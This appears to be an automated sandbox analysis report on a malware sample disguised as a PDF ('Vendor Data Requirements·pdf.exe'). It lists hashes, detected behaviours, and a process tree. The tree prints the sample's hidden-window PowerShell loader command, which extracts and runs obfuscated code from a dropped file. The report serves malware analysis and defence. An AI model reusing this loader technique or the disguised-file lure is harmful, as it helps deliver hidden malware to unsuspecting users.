Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 09:49
Static task
static1
Behavioral task
behavioral1
Sample
Vendor Data Requirements·pdf.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Vendor Data Requirements·pdf.exe
Resource
win10v2004-20240704-en
General
-
Target
Vendor Data Requirements·pdf.exe
-
Size
401KB
-
MD5
f1043033237fa935ef9af72415e657a1
-
SHA1
b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
-
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
-
SHA512
1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
-
SSDEEP
6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4088 3060 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepid process 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3060 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Vendor Data Requirements·pdf.exedescription pid process target process PID 4056 wrote to memory of 3060 4056 Vendor Data Requirements·pdf.exe powershell.exe PID 4056 wrote to memory of 3060 4056 Vendor Data Requirements·pdf.exe powershell.exe PID 4056 wrote to memory of 3060 4056 Vendor Data Requirements·pdf.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 24523⤵
- Program crash
PID:4088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3060 -ip 30601⤵PID:1712
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD58172795f7c8cfb7cc597e879d2b0b468
SHA1811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA2565339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA5129718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322